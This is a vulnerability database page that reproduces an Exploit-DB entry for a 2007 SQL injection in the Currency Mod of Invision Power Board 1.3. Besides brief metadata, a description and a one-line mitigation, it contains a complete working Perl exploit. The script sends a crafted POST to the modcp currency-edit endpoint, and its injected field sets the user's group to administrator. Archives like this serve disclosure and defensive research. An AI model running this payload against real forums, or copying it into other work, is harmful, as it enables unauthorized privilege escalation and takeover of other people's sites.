Invision Power Board Currency Mod(edit) SQL injection

vendor:

Invision Power Board

by:

Pr0T3cT10n

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Invision Power Board

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: NO

Related CWE: N/A

CPE: a:invision_power_services:invision_power_board

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: 1.3

2007

Invision Power Board Currency Mod(edit) SQL injection

Invision Power Board Currency Mod(edit) SQL injection is a vulnerability that allows an attacker to update their user to an admin account by exploiting a SQL injection vulnerability in the Invision Power Board Currency Mod(edit). The exploit is done by sending a POST request with the user's ID and password hash to the server, which then updates the user's account to an admin account.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a SQL query.

Source

Exploit-DB raw data:

# Exploit Title: Invision Power Board Currency Mod(edit) SQL injection
# Date: 17/04/2007
# Author: Pr0T3cT10n
# Software Link: www.invisionpower.com<http://www.invisionpower.com>
# Version: 1.3
# Tested on: 1.3
# CVE:
# Code:
#!/usr/bin/perl
#########################################################################
# Invision Power Board Currency Mod(edit) SQL injection. #
# Bug found by Pr0T3cT10n, pr0t3ct10n@gmail.com<mailto:pr0t3ct10n@gmail.com> #
# The exploit is updating your user to an admin account #
# **YOU SHOULD HAVE CURRENCY EDIT ACCESS!** #
#########################################################################
use IO::Socket;
use Digest::MD5 qw(md5_hex);

$host = $ARGV[0];
$path = $ARGV[1];
$id = $ARGV[2];
$passwd = $ARGV[3];

if(!$ARGV[3])
{
print "#################################################\n";
print "## IPB Currency Mod SQL injection Exploit. ##\n";
print "## Discoverd By Pr0T3cT10n. ##\n";
print "#################################################\n";
print "$0 [host] [path] [your id] [your passowrd]\n";
print "$0 host.com /forum 567 123456\n";
print "#################################################\n";
exit();
}
print "[~] Connecting $host:80...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp" ,
PeerAddr => $host ,
PeerPort => "80") or die("[-] Connection faild.\n");
print "[+] Connected.\n[~] Sending POST information...\n";
$pack.= "POST " . $path . "/index.php?act=modcp&CODE=docurrencyedit&memberid=" . $id . " HTTP/1.1\r\n";
$pack.= "Host: " . $host . "\r\n";
$pack.= "User-Agent: No_Agent\r\n";
$pack.= "Accept: */*\r\n";
$pack.= "Cookie: member_id=" .$id. "; pass_hash=" .md5_hex($passwd). "\r\n";
$pack.= "Keep-Alive: 300\r\n";
$pack.= "Connection: keep-alive\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack.= "Content-Length: 24\r\n\r\n";
$pack.= "currency=1%20%2Cmgroup=4"; #UPDATE ibf_members SET currency=1 ,mgroup=4 WHERE id='$id'

print $socket $pack;

while($res = <$socket>)
{
if($res =~ /<table align='center' cellpadding="4" class="tablefill">/)
{
print("[+] succeed.\n");
exit();
}
}
print("[-] Faild.\n");
exit();